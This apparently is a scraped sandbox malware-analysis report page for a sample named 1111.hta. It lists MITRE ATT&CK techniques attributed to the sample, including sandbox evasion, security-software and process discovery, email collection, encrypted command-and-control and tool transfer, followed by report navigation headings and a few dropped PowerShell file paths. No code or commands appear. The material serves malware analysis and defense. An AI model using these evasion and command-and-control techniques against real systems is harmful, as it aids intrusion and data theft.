Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 1111.hta

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Memory Dumps

Sigma Signatures

System Summary

Data Obfuscation

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nwku2lq1.j52.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zg3fur5x.bsq.psm1

Static File Info

General

Network Behavior

Suricata IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTPS Proxied Packets

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

back

Windows Analysis Report
1111.hta